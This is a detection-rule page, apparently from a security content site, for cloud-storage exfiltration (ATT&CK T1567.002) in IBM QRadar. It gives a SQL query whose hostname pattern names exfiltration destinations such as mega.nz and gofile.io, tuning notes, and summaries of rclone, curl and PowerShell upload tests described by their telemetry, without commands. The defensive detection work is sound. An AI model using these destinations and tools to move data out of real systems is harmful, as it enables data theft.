T1567.002 IBM QRadar · QRadar

Detect Exfiltration to Cloud Storage in IBM QRadar

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services such as Dropbox, Google Drive, OneDrive, MEGA, and Amazon S3 allow storage and retrieval of data over the Internet. Exfiltration to these services can blend with legitimate enterprise traffic, providing significant cover. Real-world threat actors including Akira, Leviathan, POLONIUM, LuminousMoth, Mustang Panda, and Kimsuky have all leveraged cloud storage for data theft. Rclone is the most commonly observed tool, used by multiple ransomware and espionage groups to automate bulk transfers to attacker-controlled cloud accounts.

MITRE ATT&CK

Tactic
Exfiltration
Technique
T1567 Exfiltration Over Web Service
Sub-technique
T1567.002 Exfiltration to Cloud Storage
Canonical reference
https://attack.mitre.org/techniques/T1567/002/

QRadar Detection Query

IBM QRadar (QRadar)
sql 
SELECT DATEFORMAT(devicetime, 'yyyy-MM-dd HH:mm:ss') as EventTime,
  logsourcename(logsourceid) as LogSource,
  "sourceip" as SourceIP, "destinationip" as DestIP,
  "Image" as ProcessImage, "DestinationHostname" as Hostname,
  SUM("BytesSent") as TotalBytesSent,
  CASE WHEN SUM("BytesSent") > 104857600 THEN 10
       WHEN SUM("BytesSent") > 10485760 THEN 7
       ELSE 4 END as RiskScore
FROM events
WHERE (
  "DestinationHostname" ILIKE ANY ('%dropbox%','%googleapis.com%','%onedrive%','%box.com%',
                                     '%mega.nz%','%wetransfer%','%mediafire%','%gofile.io%',
                                     '%anonfiles%','%sendspace%')
  AND "Direction" = 'outbound'
  AND LOWER(coalesce("Image","")) NOT LIKE ANY ('%onedrive%','%googledrive%','%dropbox%','%backup%')
)
GROUP BY "sourceip", "Image", "DestinationHostname", FLOOR(devicetime/3600000)
HAVING TotalBytesSent > 10485760
ORDER BY TotalBytesSent DESC
high severity medium confidence

Detects large outbound data transfers to cloud storage platforms in QRadar with volume-based risk scoring.

Data Sources

Network Flow via QRadarWindows Sysmon Network Events

Required Tables

events

False Positives & Tuning

  • OneDrive, Google Drive, and Dropbox desktop sync clients generating large uploads during normal backup or file sync operations
  • DevOps pipelines using rclone, azcopy, or gsutil for legitimate CI/CD artifact uploads to cloud storage
  • Backup software (Veeam, Acronis, BackBlaze) transferring large volumes to cloud-hosted S3-compatible backends
  • Data engineering workflows using gsutil or AWS CLI to transfer datasets between cloud and on-premise environments
  • Security tools performing cloud storage integrity checks or automated threat intelligence feeds pulling from S3/GCS
Download portable Sigma rule (.yml)

Other platforms for T1567.002

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Rclone Exfiltration to Dropbox (Simulated with Local Filesystem Remote)

    Expected signal: Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine containing 'copy' and the source path. A second Event ID 1 for the 'rclone config create' invocation with 'localtest local' arguments. Security Event ID 4688 if command line auditing is enabled.

  2. Test 2curl Upload to Cloud Storage API Endpoint

    Expected signal: Sysmon Event ID 1: Process Create with Image=curl.exe, CommandLine containing 'content.dropboxapi.com', '-X POST', and '--data-binary'. Sysmon Event ID 3: Network Connection attempted to content.dropboxapi.com:443. The connection will fail due to invalid token but process and network events are generated.

  3. Test 3PowerShell Upload to OneDrive Graph API

    Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'graph.microsoft.com', 'Invoke-RestMethod', 'PUT', and 'content'. Sysmon Event ID 3: Network Connection to graph.microsoft.com:443. PowerShell ScriptBlock Log Event ID 4104 with the full upload script.

  4. Test 4Rclone Configuration File Drop and Cloud Remote Enumeration

    Expected signal: Sysmon Event ID 11: File Create for %APPDATA%\rclone\rclone.conf. Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine containing 'listremotes' and '--config'. Security Event ID 4688 (if enabled) capturing the rclone invocation. The rclone.conf file creation event is a high-fidelity indicator per the hunting query targeting this artifact.

Last updated: 2026-03-13 Research depth: deep
References (12)

Unlock Pro Content

Get the full detection package for T1567.002 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1567Exfiltration Over Web Service

Related Sub-techniques

T1567.001Exfiltration to Code RepositoryT1567.003Exfiltration to Text Storage SitesT1567.004Exfiltration Over Webhook

Related Techniques

T1567Exfiltration Over Web ServiceT1567.001Exfiltration to Code RepositoryT1074.001Local Data StagingT1074.002Remote Data StagingT1560.001Archive via UtilityT1048.002Exfiltration Over Asymmetric Encrypted Non-C2 ProtocolT1020Automated ExfiltrationT1105Ingress Tool TransferT1570Lateral Tool TransferT1078.004Cloud Accounts

Same Tactic: Exfiltration

Popular Detections